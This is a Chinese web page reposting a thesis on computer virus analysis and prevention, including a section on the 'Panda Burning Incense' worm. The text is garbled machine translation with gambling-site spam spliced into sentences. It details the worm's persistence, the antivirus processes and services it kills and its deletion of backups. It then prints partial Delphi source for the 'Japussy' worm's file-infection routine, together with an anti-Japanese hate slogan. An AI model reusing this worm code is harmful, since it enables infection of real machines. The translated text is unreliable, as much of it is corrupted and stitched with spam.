毕业设计(论文)-计算机病毒分析和预防选择。 doc 31页
发布时间 :2021-03-28 20:30:39 浏览: 254次 来源:网络整理 作者:佚名
毕业设计(论文)-计算机病毒分析和预防选择。 doc 31页

陕西师范大学网络教育学院毕业论文(设计)计算机病毒分析与防护概述3 2. 1. 1计算机病毒的定义4 2. 1. 2计算机病毒的特征4 2. 2计算机病毒的分类4 2. 2. 1计算机病毒的基本分类4 2. 3计算机病毒的预防和清除的基本原理和技术6 2. 3. 1计算机病毒的预防的概念和原理6 2. 3. 2计算机病毒防护的基本技术6 2. 3. 3清除计算机病毒的基本方法6 2. 4原理,预防和清除典型计算机病毒6 2. 4. 1引导扇区计算机病毒7 2. 4. 2基于文件的计算机病毒7 2. 4. 3脚本类型计算机病毒8 2. 4. 4木马计算机病毒8 2. 4. 5蠕虫计算机病毒9 2. 5分析“熊猫烧香”病毒9 2. 6主要计算机检测技术和特征263参考文献27计算机病毒和d预防摘要当前,计算机应用程序已普及到社会的各个领域。同时,计算机病毒也给我们带来了巨大的损害和潜在的威胁。因此,为了确保计算机可以安全工作,计算机病毒防护工作已经迫在眉睫。分析了计算机病毒的特征,从及时清除计算机病毒,预防局域网病毒,加强计算机网络管理和预防个人用户等方面讨论了计算机病毒的有效预防方法。

关键字:计算机病毒的预防1引言随着计算机在社会生活的各个领域中的广泛使用,计算机病毒攻击已对我们的日常生活和工作带来了许多威胁。对于大多数计算机用户而言,谈论“计算机病毒”似乎是深不可测且不可预测的。实际上,可以防止计算机病毒。为了确保计算机使用的安全,对计算机采取预防措施非常重要。本文讨论了此问题。 2正文2.1计算机病毒概述随着社会的不断进步和科学的不断发展,计算机病毒的类型越来越多,但毕竟它们是密不可分的! 2. 1. 1计算机病毒的定义一般来说,任何可能导致计算机故障并损坏计算机中资源(包括硬件和软件)的代码统称为计算机病毒。在我国,还以法规的形式给出了计算机病毒的法律和权威定义:“计算机病毒是指被编译或插入到计算机程序中的,破坏计算机功能或破坏数据,影响计算机使用的计算机病毒。 ,并且可以是一组自我复制的计算机指令或程序代码。“ 2. 1. 2计算机病毒的特征1、隐藏的和潜在的计算机病毒是具有较高编程技能的捷径可执行程序。它通常包含在常规程序中,并且用户启动该程序并打开病毒程序。计算机病毒程序运行后即可获得系统控制,并且可以在不到1秒的时间内感染数百个程序。

此外,感染完成后,计算机系统仍可以运行,并且被感染的程序仍可以执行。这是计算机病毒感染的隐瞒...计算机病毒的潜伏期指的是一些经过精心编程的计算机。进入系统后,病毒程序可以隐藏在合法文件中数周,数月甚至数年,而不会感染其他系统文件被别人发现。 2、感染性计算机病毒可以通过各种渠道(磁盘,共享目录和邮件)从受感染的计算机传播到其他计算机,从而感染其他用户。在某些情况下,计算机会发生故障。 3、表现力和破坏力。任何计算机病毒都会对计算机产生一定程度的影响。轻者占用系统资源,并导致系统的运行速度大大降低。除了文件和数据之外,最严重的文件和数据还会导致系统崩溃。 4、可触发病毒具有预定的触发条件,可以是时间,日期,文本类型或某些特定数据。一旦满足触发条件,便会发起感染或破坏活动,以引起病毒感染或攻击;如果不满足,它将继续潜伏。一些病毒针对特定的操作系统或特定的计算机。 5、欺骗性和持久性计算机病毒是秘密运行的,计算机对它们的响应速度很慢,并且经常将由病毒引起的错误作为事实。即使发送了病毒程序,也很难恢复损坏的数据,程序和操作系统。在网络操作的情况下,由于病毒程序是从受感染的副本通过网络系统反复传输的,因此病毒程序的删除变得更加复杂。除了以上五点之外,计算机病毒还具有不可预测性,派生性,针对性等特点。

正是由于计算机病毒的这些特征,所以预防,检测和清除计算机病毒带来了很大的困难。 2. 2计算机病毒的分类2. 2. 1计算机病毒的基本分类1、传统的引导型计算机病毒,即纯引导型计算机病毒,大多在打开计算机系统后才使用软盘入侵计算机系统。上,然后等待机会感染其他软盘或硬盘,例如:“ Stoned 3”(Michelangelo)。 2、隐形启动型计算机病毒这种类型的计算机病毒会感染系统,然后检查启动区域,您将获得正常的扇区数据,就好像没有中毒一样。这种类型的计算机病毒不容易被防病毒软件检查和杀死。 ,并且防病毒软件必须能够识别这种类型的未知计算机病毒的扇区数据的真实性。这种类型的计算机病毒已经出现“鱼”。 3、文件感染类型和引导类型的计算机病毒当使用文件感染类型和引导类型的计算机病毒时,驱动程序在文件被感染时会感染引导区域,因此具有双重作用。能力,这种类型中最著名的计算机病毒是“癌症”。 4、基于目录的计算机病毒这种计算机病毒的感染方法非常独特,“ Dir2”是其代表。此类计算机病毒仅通过修改目录区域(根)即可实现其感染目的。 5、传统的基于文件的计算机病毒传统的基于文件的计算机病毒的最大特点是将计算机病毒本身植入文件中以扩展文件,从而达到传播和传播的目的。意思是“ 13 Firday”。

6、千面计算机病毒千面计算机病毒是指能够自我编码的计算机病毒。 “ 1701 Rain”是这种类型的主要代表。这种计算机病毒编码的目的是使它感染的每个文件看起来都不同,并干扰反病毒软件的检测。但是,千面电脑病毒留下的“小辫子”已被绳之以法。 7、变异引擎病毒鉴于以前的计算机病毒被一个人拦截的事实,有人编写了一个变异计算机病毒,该病毒克服了程序开始时无法被计算机病毒解决的同一问题计算机病毒与防范毕业论文,并且将其编译为OBJ子例程,以供他人植入这种计算机病毒博亚体育app ,即Mctation引擎。但是,这种类型的计算机病毒仅会干扰防病毒软件,而不会对其他防病毒软件产生太大影响。 8、不可见文件类型的计算机病毒这种类型的病毒可以避免使用多种防病毒软件,因为不可见的计算机病毒可以直接植入DOS系统的操作环境中。当外部程序调用DOS中断服务时,它将与计算机病毒本身同时执行。 ,以使计算机病毒可以从容地粉饰受感染的文件,使其外观正常无毒。此类计算机病毒包括“ 4096”等。 9、终端型计算机病毒终端型计算机病毒可以跟踪磁盘操作终端的原始入口点。当计算机病毒获得磁盘的原始中断时,它可以随意修改磁盘上的数据或常规不良数据,而不会干扰防病毒程序。 ,也就是说,防病毒程序和美容防病毒程序的情况是一样的危险。

其中一些计算机病毒使用INT 1单步执行来逐步跟踪磁盘中断过程,并找出BIOS磁盘的中断部分以供计算机病毒内部使用;一些使用崩溃的方法并记录几个BIOS的原始中断点是该磁盘版本的入口点。当计算机病毒遇到熟悉的BIOS版本时,您可以直接调用磁盘中断并请求磁盘。有些人分析了磁盘中断的程序片段,以在BIOS中找到相似的部分并直接调用磁盘中断。它的代表包括“ Hammer 6”等。 1 0、 Word宏计算机病毒Word宏计算机病毒可以说是最新类型的计算机病毒。它是基于文件的计算机病毒,与以前的计算机病毒不同,后者主要感染磁盘或可执行文件。这种病毒使用Word提供的宏功能来感染文件。当前,在Internet和BBS网络中发现了许多Word宏计算机病毒,并且这些计算机病毒是用类似于Basic的程序编写的,易于学习,并且其反战速度必须非常快。 2. 3计算机病毒防护和清除的基本原理和技术2. 3. 1计算机病毒防护的概念和原理计算机病毒防护是指建立合理的计算机病毒防护系统和系统,即使计算机发现病毒入侵,并采取有效措施,防止计算机病毒的传播和破坏,并恢复受影响的计算机系统和数据。其原则是主动防御计算机病毒,主要表现为检测行为的动态性和广泛的预防方法。

2. 3. 2计算机病毒防护的基本技术计算机病毒防护是阻止和阻止计算机病毒的入侵,或者在计算机病毒入侵或刚刚入侵之前立即发出警报。当前在计算机病毒防护工具中使用的主要技术如下:2. 3. 3清除计算机病毒的基本方法1.简单工具处理简单工具处理是指使用诸如Debug之类的简单工具来帮助特定用户。了解一种计算机病毒,请从感染了计算机病毒的软件中删除计算机代码。但是,该方法还要求检查者的专业素质较高,并且治疗效率也较低。 2.特殊工具处理一种使用特殊工具来处理受感染程序的常用处理方法。特殊的计算机处理工具会根据计算机病毒特征的记录自动删除受感染程序中的计算机病毒代码,以便将其还原。使用特殊工具处理计算机病毒时,处理操作简单有效。从探索和计算机病毒对抗的整个过程的角度来看,专用工具的开发人员还从简单的治疗工具入手,当治疗成功后,他们将开发相应的软件产品,以便计算机可以自动完成所有治疗操作。 2. 4典型计算机病毒的原理,预防和清除2. 4. 1引导区域当计算机病毒系统启动时,它在系统启动时进入系统,获得系统控制权,并完成自身的启动系统安装后。当它被称为启动扇区计算机病毒时,这种类型的计算机病毒通常会入侵系统硬盘的主启动扇区I / O分区的启动扇区,对于软盘,它会入侵计算机的启动扇区。软盘。

它将感染系统中执行读写操作的所有软盘亚博app手机版 ,然后将这些软盘复制并引导到其他计算机系统中,以感染其他计算机的操作系统。如何检测呢?检查系统内存总量,并将其与正常情况进行比较。检查系统内存的高端内容。检查系统的INT 13H中断向量。检查硬盘的主引导扇区,DOS分区的引导扇区和软盘的引导扇区。清除:使用原始的普通分区表信息或引导扇区信息,覆盖计算机病毒程序。此时,如果用户预先将分区表信息和DOS分区引导扇区信息提取并保存在硬盘中,则恢复工作将变得非常简单。您可以直接使用Debug将这两个引导扇区的内容分别传输到内存中,然后分别返回到它们的原始位置,从而消除了计算机病毒。 2. 4. 2基于文件的计算机病毒程序所有基于文件的计算机病毒程序都附加到系统可执行文件或覆盖文件中。将文件加载到系统中以供执行时,引导计算机病毒程序也会进入系统。很少有计算机病毒程序感染数据文件。这些病毒大多数会感染系统的可执行文件,有些还会感染被覆盖的文件,但是很少会感染数据。清除:确定计算机病毒程序的位置,无论它位于文件末尾还是文件开头。找到计算机病毒程序的第一个位置(对应于文件末尾的驻留模式),或查找结尾位置(对应于文件开头的常驻模式)。

还原原始文件头的参数。修改文件长度,然后将源文件写回。 2. 4. 3脚本型计算机病毒主要由脚本语言设计,被称为脚本病毒。实际上,在早期系统中,计算机病毒已开始使用脚本进行传播和销毁,但是专门的脚本病毒并不常见。但是在当今无处不在的脚本应用程序中,脚本病毒已成为危害最大,分布最广的病毒,尤其是当它与某些传统的恶性病毒结合使用时,其危害更加严重。有两种主要类型,纯脚本类型和混合类型。它的特点是:编写简单,破坏力强,感染力强,传播范围广(主要通过电子邮件传播,局域网共享和网页文件感染)。计算机病毒的源代码很容易获得,而且欺骗性的多样性使计算机病毒的产生机先行。删除非常容易:禁用文件系统对象FileSystemObject卸载Windows Scripting Host删除Windows目录中的vbs,vbe,js,jse文件后缀和应用程序映射,找到WScript.exe,更改名称或删除以完全防止vbs网络蠕虫病毒,还需要将浏览器设置为禁止OE的自动电子邮件发送和接收功能,显示所有文件类型的扩展名,并将系统网络连接的安全级别设置为至少“中等” 2. 4. 4特洛伊木马计算机病毒也称为特洛伊木马。黑客程序或后门病毒是指在正常程序中带有特殊功能的程序。它是隐藏的,难以检测。这是一种极其危险的网络攻击手段。

第一代:伪装病毒,第二代:艾滋病型木马,第三代:如何检查网络传播的木马?检查注册表以检查系统配置文件。清除:备份重要数据并立即关闭电源。备份特洛伊木马以入侵现场。修复特洛伊木马。 2. 4. 5蠕虫计算机病毒蠕虫是一种通过网络传播的恶意计算机病毒。计算机病毒的一些常见特征,例如传播,隐藏,破坏性等。同时,我也具有自己的一些特征,例如使用文件寄生,拒绝对网络提供服务以及与黑客技术的结合。 。简而言之,蠕虫使用有害代码攻击网络上的受害主机,在受害主机上进行自我复制,然后再攻击来自其他受害主机的计算机病毒。它的特征是:自我复制和利用软件漏洞会导致网络拥塞并消耗系统资源,从而留下隐藏的安全隐患。消除:与防火墙联锁,以通知HIDS(基于主机的入侵检测)警报2. 5“熊猫烧香”病毒分析“熊猫烧香”病毒感染机制:“熊猫烧香”是一种感染性蠕虫。它可以感染exe,com,pif,src,html,asp和系统中的其他文件。它还可以停止大量的防病毒软件进程并删除扩展名。这是一个gho文件,它是系统备份工具GHOST的备份文件,因此用户的系统备份文件会丢失。被感染用户系统中的所有.exe可执行文件都被更改为看起来像熊猫,里面装有三个香棒。

1:复制文件病毒运行后,它将自身复制到C:\ WINDOWS \ System32 \ Drivers \ spoclsv.exe2:添加注册表自动启动病毒将添加自动启动密钥HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \运行svcshare-> C:\ WINDOWS \ System32 \ Drivers \ spoclsv.exe 3:病毒行为a:每1秒查找一次桌面窗口,然后关闭该窗口标题中包含以下字符的程序:QQKav ,QQAV,防火墙,进程,VirusScan,NetDart,防病毒,防病毒,瑞星,江民,黄山IE,超级兔子,优化程序,特洛伊木马标记,特洛伊木马清道夫,QQ病毒,注册表编辑器,系统配置实用程序,卡巴斯基反病毒软件,Symantec AntiVirus ,Duba,尊敬过程,Green Eagle PC,密码防盗,噬菌体,Trojan辅助查找器,系统安全监视器,包装的礼品杀手,Winsock Expert,游戏Trojan检测主机,msctls_statusbar3 2、 pjf(ustc),IceSword和二手键盘映射方法关闭安全软件I ceSword。

添加注册表以启动HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run svcshare-> C:\ WINDOWS \ System32 \ Drivers \ spoclsv.exe并终止系统中的以下过程:Mcshield.exe,VsTskMgr。 exe,naPrdMgr.exe,UpdaterUI.exe,TBMon.exe球探体育 ,scan3 2. exe,Ravmond.exe,CCenter.exe,RavTask.exe,Rav.exe,Ravmon.exe,RavmonD.exe,RavStub.exe,KVXP。 kxp,kvMonXP.kxp,KVCenter.kxp,KVSrvXP.exe,KRegEx.exe计算机病毒与防范毕业论文,UIHost.exe,TrojDie.kxp,FrogAgent.exe,Logo1_.exe,Logo_ 1. exe,Rundl13 2. exe。 b:每隔18秒钟单击病毒作者指定的网页,然后使用命令行检查系统中是否存在共享。如果确实存在,请运行net share命令关闭admin $共享。 c:每隔10秒钟下载病毒作者指定的文件,并使用命令行检查系统中是否存在共享。如果确实存在,请运行net share命令关闭admin $共享。

d:每6秒钟删除一次注册表中安全软件的键值。并修改以下值以不显示隐藏文件HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced \ Folder \ Hidden \ SHOWALL CheckedValue-> 0x00删除以下服务:navapsvc,wscsvc,KPfwSvc,SNDSRvc,ccProxy, ccEvtMgr,ccSetMgr,Symantec Core LC,NPMFntor MskService,FireSvc。 e:被感染的文件病毒将感染扩展名为exe,pif,com,src的文件,将自身附加到文件的开头,然后将文件添加到扩展名为htm,html,asp,php,jsp,aspx URL的文件中。用户打开文件后,IE会继续在后台单击书面URL以增加点击次数,但该病毒不会感染以下文件夹名称中的文件:WINDOW,Winnt,System Volume Information,Recycled, Windows NT,WindowsUpdate,Windows Media Player,Outlook Express,Internet Explorer,NetMeeting,公用文件,ComPlus应用程序,Messenger,InstallShield安装信息,MSN,Microsoft Frontpage,Movie Maker,MSN Gamin区域。

g:删除文件。该病毒将删除扩展名为gho的文件。该文件是系统备份工具GHOST的备份文件,它会导致用户的系统备份文件丢失。 “ Panda Burning Incense”病毒核心​​源代码是用Delphi程序Japussy编写的;使用Windows,SysUtils,类,图形,ShellAPI {,注册表}; constHeaderSize = 82432; //病毒主体的大小IconOffset = $ 12EB8; // PE文件主图标的偏差Shift //通过以下方法获得的大小在我的Delphi5 SP1上编译时,其他版本的Delphi可能不同//搜索的十六进制字符串可以找到主图标的偏移量{HeaderSize = 38912; // Upx压缩病毒主体大小IconOffset = $ 92BC; // Upx压缩PE文件主图标偏移量// Upx 1. 24W用法:upx -9 --8086 Japussy.exe} IconSize = $ 2E8; // PE文件main图标的大小-744字节IconTail = IconOffset + IconSize; // PE文件主图标的尾部ID = $; //感染标记//用于编写Catchword的垃圾邮件代码='如果需要消灭种族,则必须是Yamato。'+'如果需要一个国家/地区要被摧毁,一定是日本! '+'*** W3 2. Japussy.Worm.A ***'; {$ R * .RES} Function RegisterServiceProcess()function RegisterServiceProcess(dwProcessID,dwType:Integer):Integer; stdcall;外部的'Kernel3 2. dll'; //函数声明varTmpFile:string; Si:STARTUPINFO; Pi:PROCESS_INFORMATION; IsJap:Boolean = False; //日语操作系统标志{确定是否为Win9x}函数IsWin9x()函数IsWin9x:布尔值; varVer:TOSVersionInfo; beginResult:= False; Ver.dwOSVersionInfoSize:= SizeOf(TOSVers ionInfo);如果不是GetVersionEx(Ver)thenExit;如果(Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS)然后// Win9xResult:= True; end; {在流之间复制)过程CopyStream(Src:TStream; sStartPos:Integer; Dst:TStream; dStartPos:Integer; Count:Integer); :Integer; beginsCurPos:= Src.Position; dCurPos:= Dst.Position; Src.Seek(sStartPos,0); Dst.Seek(dStartPos,0))Dst.CopyFrom(Src,Count); Src.Seek(sCurPos ,0); Dst.Seek(dCurPos,0); end; {从受感染的PE文件中分离主机文件以供使用}过程ExtractFile(FileName:string); varsStream,dStream:TFileStream; begintrysStream:= TFileStream.Create (ParamStr(0),fmOpenRead orfmShareDenyNone); trydStream:= TFileStream.Create(FileName,fmCreate); trysStream.Seek(HeaderSize,0); //跳过头部的病毒部分dStream.CopyFrom(sStream,sStream.Size-HeaderSize); finallydStream.Free; end; finallysStream.Free; end; exceptend; end; {fill STARTUPINFO结构}过程FillStartupInfo(var Si:STARTUPINFO;状态:字); beginSi.cb:= SizeOf(Si); Si.lpReserved:= nil; Si.lpDesktop:= nil; Si.lpT itle:= nil; Si.dwFlags:= STARTF_USESHOWWINDOW; Si.wShowWindow:= State ; Si.cbReserved2:= 0; Si.lpReserved2:= nil; end; {发送有毒邮件}程序SendMail; begin //哪个人愿意完成它?结束; {感染PE文件}过程InfectOneFile(FileName:string); varHdrStream,SrcStream:TFileStream; IcoStream,DstStream:TMemoryStream; iID:LongInt; aIcon:TIcon; Infected,IsPE:Boolean; i:Integer; Buf:array [0. .1] of Char ;; //如果发生错误,正在使用该文件,如果CompareText(FileName,'JAPUSSY.EXE')= 0,则退出,然后//如果您自己,则不会被感染退出感染:= False; IsPE:= False; SrcStream:= TFileStream.Create(FileName,fmOpenRead); tryfor i:= 0至$ 108 do //检查PE文件头beginSrcStream.Seek(i,soFromBeginning); SrcStream.Read(Buf,2); if(Buf [0] =#8 0)和(Buf [1] =#6 9)),// PE标志beginIsPE:= True; //这是PE file Break; end; end; SrcStream.Seek(-4,soFromEnd); //检查感染标记SrcStream.Read(iID,4); if(iID = ID)或(SrcStream.Size

上一篇 计算机病毒预防论文
下一篇
深圳公司:
AG体育-首页
Shenzhen Moan Enterprise Image Design Co., Ltd.
深圳市福田区红荔西路第壹世界广场B座15A
15A,Building B,First World Plaza,No,7002,West Hongli Rd,Shenzhen
400-833-0755
135 9035 8806
0755-8392 3996
香港公司:
香港摩恩企业形象设计有限公司
Hong Kong Moan Enterprise Image Design Co., Ltd.
香港尖沙咀海港城海运大厦叁楼302室
Room 302, 3 / F, Maritime Building, Harbour City, Tsim Sha Tsui, Hongkong.
00852-6778 6216
Copyright © 2008-2019 | All Rights Reserved   |  AG体育-首页  粤ICP备06061602号